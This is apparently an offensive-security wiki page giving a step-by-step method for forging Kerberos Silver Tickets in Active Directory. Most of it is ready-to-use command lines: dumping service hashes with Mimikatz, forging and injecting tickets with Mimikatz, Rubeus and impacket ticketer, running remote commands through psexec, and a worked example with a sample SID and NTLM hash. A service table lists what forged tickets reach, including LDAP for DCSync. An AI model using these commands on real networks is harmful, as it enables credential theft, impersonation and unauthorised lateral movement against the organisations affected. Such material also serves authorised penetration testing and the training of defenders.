Silver Ticket

We know that authorizations/permissions (group memberships) are provided by the KDC in the TGS and then checked by the SPN in question. This means that if we have the credentials/hash of the SPN (kerberoasting, NTLM account, etc.), we can create a Silver Ticket with any privilege.

There is an optional authentication, rarely implemented for service applications, called PAC (Privileged Account Certificate) validation, which consists of a check that the service does with the domain controller of the permissions and authorizations.

In general, we need to collect the following three pieces of information to create a silver ticket:

SPN password hash
Domain SID
Target SPN

Attack

Mimikatz

If you have administrator privileges you can get the NTLM hashes of the services with sekurlsa::logonpasswords. Otherwise use other techniques.

Forge Silver Ticket

.\mimikatz.exe
kerberos::golden /sid:<SID_DOMAIN> /domain:<DOMAIN> /ptt /target:<TARGET> /service:<NAME_SPN> /rc4:<NTLM_SPN> /id:<FOR_RID> /user:<FOR_USER>

/ptt

Inject the forged ticket to memory to make it usable immediately

/sid

Domain SID (whoami /user without RID)

/domain

Domain in FQDN

/target

Machine that hosting the attacked service in FQDN

/service

SPN service ticket

/rc4

NTLM hash of the service for encryption. There is also /ntlm,/aes128 or /aes256

/id

For which RID to forge the ticket

/user

For which user to forge the ticket (can be fake)

kerberos::golden /sid:S-1-5-21-4172452648-1021989953-2368502130-1105 /domain:offense.local /ptt /id:1155 /target:web04.offense.local /service:http /rc4:a87f3a337d73085c45f9416be5787d86 /user:beningnadmin

iwr -UseDefaultCredentials http://web04

Rubeus

In Current Process

Rubeus.exe silver /service:<NAME_SPN>/<TARGET> /rc4:<NTLM_SPN> /user:<FOR_USER> /domain:<DOMAIN> /sid:<SID_DOMAIN> /nowrap /ptt

For arguments see mimikatz above.

In New Process

Create Ticket

Rubeus.exe silver /service:<NAME_SPN>/<TARGET> /rc4:<NTLM_SPN> /user:<FOR_USER> /domain:<DOMAIN> /sid:<SID_DOMAIN> /nowrap
# Take note ticket

Create Process

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USER> /password:<PASS>
# Take note of the LUID and PID
# Username and password can be anything

Inject Ticket

Rubeus.exe ptt /luid:<LUID> /ticket:<TICKET>

Impersonate Process with Invoke-SharpImpersonation.

Invoke-SharpImpersonation -Command "pid:<PID>"

impacket-ticketer

ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE>/<TARGET> -user <USER> <TARGET>

For arguments see mimikatz in Locally.

Export the ticket and use it

chmod 600 <TICKET_NAME>.ccache
export KRB5CCNAME=<TICKET_NAME>.ccache

python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
curl -v --negotiate -u : http://<TARGET>

Remember to add IP of the target to /etc/hosts

SPN service

Service Type

Service Silver Tickets

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Depending on OS also:

WSMAN

RPCSS

WinRM

HOST

HTTP

In some occasions you can just ask for: WINRM

Scheduled Tasks

HOST

Windows File Share, also psexec

CIFS

LDAP operations, included DCSync

LDAP

Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS

Golden Tickets

krbtgt

Last updated 25 days ago

hashtagAttack

hashtagMimikatzarrow-up-right

hashtagRubeusarrow-up-right

hashtagSPN service

Attack

Mimikatz

Rubeus

SPN service